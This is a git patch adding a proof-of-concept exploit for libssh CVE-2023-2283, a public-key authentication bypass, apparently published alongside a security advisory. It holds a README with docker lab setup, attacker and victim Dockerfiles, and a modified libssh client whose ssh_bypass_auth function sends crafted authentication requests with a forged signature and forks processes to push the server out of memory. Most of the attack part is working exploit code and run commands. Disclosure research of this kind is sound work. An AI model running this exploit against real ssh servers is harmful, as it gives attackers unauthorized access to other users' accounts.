From 79b4e6fa9729d1e61d839dd60d01eeabbc72d8f4 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Wed, 7 Jun 2023 12:38:20 +0100 Subject: [PATCH] PoC for libssh CVE-2023-2283 --- .../README.md | 104 +++++ .../attacker/Dockerfile | 35 ++ .../attacker/home/.bash_history | 1 + .../attacker/home/.tmux.conf | 11 + .../attacker/home/diff.txt | 399 ++++++++++++++++++ .../attacker/home/id_ed25519.pub | 1 + .../attacker/home/id_rsa.pub | 1 + .../server/Dockerfile | 35 ++ .../server/home/.bash_history | 5 + .../server/home/.ssh/authorized_keys | 1 + .../server/home/.ssh/id_ed25519.pub | 1 + .../server/home/.ssh/id_rsa.pub | 1 + .../server/home/.tmux.conf | 11 + 13 files changed, 606 insertions(+) create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md new file mode 100644 index 0000000..6cfb209 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md @@ -0,0 +1,104 @@ +# Public key authentication bypass in libssh (CVE-2023-2283) + +[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/) +is an authentication bypass vulnerability in +[libssh](https://www.libssh.org/), which, under certain conditions, may +enable a remote attacker to gain unauthorized access to another user’s +account via ssh login. + +This demo uses docker to simulate two computers, named "libssh-server" +and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`, +which is a simple ssh server application that is [included as an +example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c) +with the libssh source code. The server is configured to allow public +key authentication with an ED25519 key, but the attacker does not know the +private key. The attacker instead authenticates by triggering the vulnerability. + +The vulnerability is triggered when `ssh_server_pthread` hits an +out-of-memory condition at precisely the right moment. If libssh is +running on a 64-bit server with plenty of RAM then it is very unlikely +that an attacker will be able to generate enough memory pressure to +cause an out-of-memory error, which means that the vulnerability is +unlikely to be exploitable. The goal of this demo is, instead, to show +that the vulnerability is exploitable if libssh is running in a +memory-constrained environment such as a [memory-constrained +container](https://docs.docker.com/config/containers/resource_constraints/), +which we believe is a realistic scenario for a real-life libssh deployment. +The demo uses `ulimit` to set a 256MB memory limit on the ssh server. + +## Network setup + +Create a docker network bridge, to simulate a network with two separate computers. + +``` +docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network +``` + +## Server setup + +Build the docker image: + +``` +docker build server -t libssh-server --build-arg UID=`id -u` +``` + +Start the container: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server +``` + +If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server +``` + +Inside the container, run these commands to create ssh keys for the server: + +``` +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +``` + +Start the server: + +``` +ulimit -v 262144 # 256MB +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 +``` + +Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x". + +## Attacker setup + +Build the docker image: + +``` +docker build attacker -t libssh-attacker --build-arg UID=`id -u` +``` + +Start the container: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker +``` + +If you want to be able to debug the client, then you need to start the container with some extra command line arguments: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker +``` + +The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step. + +Run the malicious client like this: + +``` +~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub +``` + +The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instance of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop. + +Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process. diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile new file mode 100644 index 0000000..21837c6 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile @@ -0,0 +1,35 @@ +FROM ubuntu:22.04 + +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y \ + sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ + libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg + +ARG UID=1000 + +# Create a non-root user account to run libssh. +RUN adduser attacker --disabled-password --uid $UID + +# Grant the 'attacker' user sudo access. This is not used for the demo, +# but it is often handy for installing extra packages. +RUN adduser attacker sudo +RUN echo "attacker:x" | chpasswd +COPY home/ /home/attacker/ +RUN chown -R attacker:attacker /home/attacker + +# Switch over to the 'attacker' user, since root access is no longer required +USER attacker +WORKDIR /home/attacker + +# Clone and build libssh v0.10.4 +RUN git clone https://git.libssh.org/projects/libssh.git && \ + cd libssh && \ + git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ + git apply ~/diff.txt && \ + mkdir build && cd build && \ + cmake .. && \ + make -j $(nproc) + +USER attacker diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history new file mode 100644 index 0000000..5df6160 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history @@ -0,0 +1 @@ +~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. +set -g update-environment -r + +# history buffer size +set-option -g history-limit 100000 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt new file mode 100644 index 0000000..c56191d --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt @@ -0,0 +1,399 @@ +diff --git a/examples/ssh_client.c b/examples/ssh_client.c +index aaf0cb5b..4055a2c5 100644 +--- a/examples/ssh_client.c ++++ b/examples/ssh_client.c +@@ -32,10 +32,12 @@ + #include + #endif + ++#include + #include + #include + #include + #include ++#include + + #include + #include +@@ -47,6 +49,7 @@ + + static char *host = NULL; + static char *user = NULL; ++static char *pubkey_filename = NULL; + static char *cmds[MAXCMD]; + static char *config_file = NULL; + static struct termios terminal; +@@ -89,7 +92,7 @@ static void add_cmd(char *cmd) + static void usage(void) + { + fprintf(stderr, +- "Usage : ssh [options] [login@]hostname\n" ++ "Usage : ssh [options] [login@]hostname pubkey_file\n" + "sample client - libssh-%s\n" + "Options :\n" + " -l user : log in as user\n" +@@ -134,12 +137,15 @@ static int opts(int argc, char **argv) + if (optind < argc) { + host = argv[optind++]; + } ++ if (optind < argc) { ++ pubkey_filename = argv[optind++]; ++ } + + while(optind < argc) { + add_cmd(argv[optind++]); + } + +- if (host == NULL) { ++ if (host == NULL || pubkey_filename == NULL) { + return -1; + } + +@@ -321,12 +327,27 @@ static void batch_shell(ssh_session session) + ssh_channel_free(channel); + } + +-static int client(ssh_session session) ++static void kill_procs(const int nprocs, pid_t *cpids) { ++ int i; ++ for (i = 0; i+1 < nprocs; i++) { ++ const pid_t cpid = cpids[i]; ++ if (cpid > 0) { ++ cpids[i] = -1; ++ kill(cpid, SIGTERM); ++ waitpid(cpid, 0, 0); ++ } ++ } ++} ++ ++static int client(ssh_session session, const int myid, const int nprocs, pid_t *cpids) + { +- int auth = 0; + char *banner; + int state; ++ int result; + ++ if (ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "zlib") < 0) { ++ return -1; ++ } + if (user) { + if (ssh_options_set(session, SSH_OPTIONS_USER, user) < 0) { + return -1; +@@ -352,6 +373,7 @@ static int client(ssh_session session) + fprintf(stderr, "Connection failed : %s\n", ssh_get_error(session)); + return -1; + } ++ printf("connection successful: %d\n", myid); + + state = verify_knownhost(session); + if (state != 0) { +@@ -364,16 +386,21 @@ static int client(ssh_session session) + printf("%s\n", banner); + free(banner); + } +- auth = authenticate_console(session); +- if (auth != SSH_AUTH_SUCCESS) { ++ result = ssh_bypass_auth(session, pubkey_filename, myid, nprocs); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } ++ if (result < 0) { + return -1; ++ } else { ++ // Write a file named success.txt ++ close(open("success.txt", O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR)); + } + if (cmds[0] == NULL) { + shell(session); + } else { + batch_shell(session); + } +- + return 0; + } + +@@ -406,9 +433,48 @@ static void cleanup_pcap(void) + pcap = NULL; + } + +-int main(int argc, char **argv) ++static int run(int argc, char **argv) + { + ssh_session session; ++ pid_t cpids[5]; ++ int result; ++ ++ // Fork a few times to increase the amount of memory pressure on the server. ++ const int nprocs = 1 + (rand() % (1 + sizeof(cpids)/sizeof(cpids[0]))); ++ int myid; ++ printf("nprocs = %d\n", nprocs); ++ for (myid = 1; myid < nprocs; myid++) { ++ struct timespec tm = {0}; ++ pid_t cpid = fork(); ++ if (cpid < 0) { ++ const int err = errno; ++ fprintf(stderr, "fork failed: %s\n", strerror(err)); ++ exit(EXIT_FAILURE); ++ } else if (cpid == 0) { ++ break; ++ } ++ ++ cpids[myid-1] = cpid; ++ // Short delay between each fork so that they don't all try to connect ++ // at once. ++ tm.tv_nsec = 1000000000L / 10; ++ nanosleep(&tm, 0); ++ } ++ if (myid == nprocs) { ++ myid = 0; ++ } else { ++ // Suppress output in the forks ++ const int stdin_new = open("/dev/null", O_RDONLY); ++ const int stdout_new = open("/dev/null", O_RDONLY); ++ const int stderr_new = open("/dev/null", O_RDONLY); ++ dup2(stdin_new, STDIN_FILENO); ++ dup2(stdout_new, STDOUT_FILENO); ++ dup2(stderr_new, STDERR_FILENO); ++ close(stdin_new); ++ close(stdout_new); ++ close(stderr_new); ++ } ++ printf("fork id %d\n", myid); + + ssh_init(); + session = ssh_new(); +@@ -427,7 +493,10 @@ int main(int argc, char **argv) + signal(SIGTERM, do_exit); + + set_pcap(session); +- client(session); ++ result = client(session, myid, nprocs, cpids); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } + + ssh_disconnect(session); + ssh_free(session); +@@ -435,5 +504,36 @@ int main(int argc, char **argv) + + ssh_finalize(); + +- return 0; ++ return result; ++} ++ ++int main(int argc, char **argv) ++{ ++ // Keep restarting the process until it's successful. ++ while (1) { ++ const pid_t cpid = fork(); ++ if (cpid == 0) { ++ break; ++ } else if (cpid > 0) { ++ int wstatus = 0; ++ waitpid(cpid, &wstatus, 0); ++ if (WEXITSTATUS(wstatus) == EXIT_SUCCESS) { ++ return EXIT_SUCCESS; ++ } ++ } else { ++ return EXIT_FAILURE; ++ } ++ } ++ ++ if (open("success.txt", O_RDONLY) >= 0) { ++ printf("Stopping because a file named success.txt was found.\n"); ++ return EXIT_SUCCESS; ++ } ++ ++ srand(time(0)); ++ if (run(argc, argv) == 0) { ++ return EXIT_SUCCESS; ++ } else { ++ return EXIT_FAILURE; ++ } + } +diff --git a/include/libssh/libssh.h b/include/libssh/libssh.h +index 7857a77b..e79da840 100644 +--- a/include/libssh/libssh.h ++++ b/include/libssh/libssh.h +@@ -508,6 +508,9 @@ LIBSSH_API void ssh_disconnect(ssh_session session); + LIBSSH_API char *ssh_dirname (const char *path); + LIBSSH_API int ssh_finalize(void); + ++LIBSSH_API int ssh_bypass_auth(ssh_session session, const char* pubkey_filename, const int myid, const int nprocs); ++ ++ + /* REVERSE PORT FORWARDING */ + LIBSSH_API ssh_channel ssh_channel_open_forward_port(ssh_session session, + int timeout_ms, +diff --git a/src/client.c b/src/client.c +index a35a28e1..e2facc4a 100644 +--- a/src/client.c ++++ b/src/client.c +@@ -24,6 +24,7 @@ + #include "config.h" + + #include ++#include + + #ifndef _WIN32 + #include +@@ -46,6 +47,7 @@ + #include "libssh/misc.h" + #include "libssh/pki.h" + #include "libssh/kex.h" ++#include "libssh/string.h" + + #define set_status(session, status) do {\ + if (session->common.callbacks && session->common.callbacks->connect_status_function) \ +@@ -834,6 +836,138 @@ error: + } + } + ++static int send_service_request(ssh_session session, ssh_string str, bool set_wontblock) { ++ ssh_buffer_pack(session->out_buffer, "bS", SSH2_MSG_SERVICE_REQUEST, str); ++ if (set_wontblock) { ++ ssh_socket_set_write_wontblock(session->socket); ++ } ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ printf("Sending SSH2_MSG_UNIMPLEMENTED failed.\n"); ++ return -1; ++ } ++ return 0; ++} ++ ++int ssh_bypass_auth(ssh_session session, const char *pubkey_filename, const int myid, const int nprocs) { ++ struct ssh_crypto_struct *crypto = ssh_packet_get_current_crypto(session, SSH_DIRECTION_BOTH); ++ size_t i, n; ++ int rc; ++ int result = -1; ++ ++ if (myid > 0) { ++ size_t sizes[5] = {0x40000 - 5, 0x40000 - 5, 0x40000 - 5, 0x4000 - 5, 0xf00 - 5}; ++ ssh_string str; ++ sleep(1); ++ assert(myid <= sizeof(sizes)/sizeof(sizes[0])); ++ const size_t slen = sizes[myid-1]; ++ printf("slen = %lx\n", slen); ++ str = ssh_string_new(slen); ++ // note: ssh_string has a length field, so you don't have to nul-terminate them. ++ memset(ssh_string_data(str), 'x', slen); ++ for (i = 0; i < 192; i++) { ++ if (send_service_request(session, str, i >= 0) < 0) { ++ return result; ++ } ++ } ++ ssh_string_free(str); ++ pause(); ++ } else { ++ const char *sig_type_c = NULL; ++ ssh_key pubkey = NULL; ++ ssh_string pubkey_s = NULL; ++ ++ ssh_pki_import_pubkey_file(pubkey_filename, &pubkey); ++ ssh_pki_export_pubkey_blob(pubkey, &pubkey_s); ++ ++ sig_type_c = ssh_key_get_signature_algorithm(session, pubkey->type); ++ printf("sig_type_c = %s\n", sig_type_c); ++ sleep(2); ++ for (i = 0; i < 100 && result < 0; i++) { ++ ssh_string username; ++ ssh_string service; ++ ssh_string algo; ++ ++ // 0x37 is the maximum string length that will fit in an 0x40-sized malloc chunk. ++ username = ssh_string_new(0x37 + i * 0x400); ++ memset(ssh_string_data(username), 0, ssh_string_len(username)); ++ if (ssh_string_fill(username, session->opts.username, strlen(session->opts.username)) < 0) { ++ printf("username is too long: %s\n", session->opts.username); ++ return result; ++ } ++ service = ssh_string_new(0x37 + i * 0x500); ++ memset(ssh_string_data(service), 0, ssh_string_len(service)); ++ ssh_string_fill(service, "ssh-connection", 15); ++ algo = ssh_string_new(1); ++ memset(ssh_string_data(algo), 'x', ssh_string_len(algo)); ++ printf("send userauth 0\n"); ++ ssh_buffer_pack(session->out_buffer, "bSSsbSS", ++ SSH2_MSG_USERAUTH_REQUEST, ++ username, ++ service, ++ "publickey", ++ 1, /* private key */ ++ algo, ++ pubkey_s /* public key */ ++ ); ++ ssh_string_free(username); ++ ssh_string_free(service); ++ ssh_string_free(algo); ++ ++ ssh_string fakesig = ssh_string_new(90 /*i == 0 ? 400 : 0x400 * i*/); ++ memset(ssh_string_data(fakesig), 'x', ssh_string_len(fakesig)); ++ ssh_string sigtype = ssh_string_from_char(sig_type_c); ++ size_t sigtypelen = ssh_string_len(sigtype) + sizeof(uint32_t); ++ ssh_string payload = ssh_string_new(ED25519_SIG_LEN); ++ memcpy(ssh_string_data(payload), "kevwozere", 10); ++ size_t payloadlen = ssh_string_len(payload) + sizeof(uint32_t); ++ assert(sigtypelen + payloadlen <= ssh_string_len(fakesig)); ++ memcpy(ssh_string_data(fakesig), sigtype, sigtypelen); ++ memcpy((char*)ssh_string_data(fakesig) + sigtypelen, payload, payloadlen); ++ ssh_string_free(sigtype); ++ ssh_string_free(payload); ++ ssh_buffer_pack(session->out_buffer, "S", fakesig); ++ ssh_string_free(fakesig); ++ session->auth.service_state = SSH_AUTH_SERVICE_SENT; ++ session->auth.current_method = SSH_AUTH_METHOD_PUBLICKEY; ++ session->auth.state = SSH_AUTH_STATE_PUBKEY_AUTH_SENT; ++ session->pending_call_state = SSH_PENDING_CALL_AUTH_PUBKEY; ++ ++ printf("out_buf size: %x\n", ssh_buffer_get_len(session->out_buffer)); ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ return result; ++ } ++ printf("send userauth 1\n"); ++ ++ // If the userauth message was unsuccessful then we don't get ++ // a reply from the server. So we send a short service request ++ // message, which will get a reply. Then we can tell from ++ // which type of reply we receive whether the userauth was ++ // successful. ++ { ++ ssh_string str = ssh_string_from_char("x"); ++ if (send_service_request(session, str, true) < 0) { ++ return result; ++ } ++ ssh_string_free(str); ++ } ++ ++ rc=ssh_handle_packets_termination(session,SSH_TIMEOUT_USER, ++ ssh_service_request_termination, session); ++ printf("rc = %d\n", rc); ++ if (session->auth.state == SSH_AUTH_STATE_SUCCESS) { ++ result = 0; ++ } ++ } ++ ssh_string_free(pubkey_s); ++ ssh_key_free(pubkey); ++ } ++ return result; ++} ++ + const char *ssh_copyright(void) + { + return SSH_STRINGIFY(LIBSSH_VERSION) " (c) 2003-2022 " +diff --git a/src/libssh.map b/src/libssh.map +index eeb625c5..f20d89b9 100644 +--- a/src/libssh.map ++++ b/src/libssh.map +@@ -188,6 +188,7 @@ LIBSSH_4_5_0 # Released + ssh_connector_set_out_channel; + ssh_connector_set_out_fd; + ssh_copyright; ++ ssh_bypass_auth; + ssh_dirname; + ssh_disconnect; + ssh_dump_knownhost; diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile new file mode 100644 index 0000000..97d50ea --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile @@ -0,0 +1,35 @@ +FROM ubuntu:22.04 + +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y \ + sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ + libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg \ + libc6-dbg + +ARG UID=1000 + +# Create a non-root user account to run libssh. +RUN adduser victim --disabled-password --uid $UID + +# Grant the 'victim' user sudo access. This is not used for the demo, +# but it is often handy for installing extra packages. +RUN adduser victim sudo +RUN echo "victim:x" | chpasswd +COPY home/ /home/victim/ +RUN chown -R victim:victim /home/victim + +# Switch over to the 'victim' user, since root access is no longer required +USER victim +WORKDIR /home/victim + +# Clone and build libssh v0.10.4 +RUN git clone https://git.libssh.org/projects/libssh.git && \ + cd libssh && \ + git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ + mkdir build && cd build && \ + cmake .. && \ + make -j $(nproc) + +USER victim diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history new file mode 100644 index 0000000..d291675 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history @@ -0,0 +1,5 @@ +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +ulimit -v 262144 +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. +set -g update-environment -r + +# history buffer size +set-option -g history-limit 100000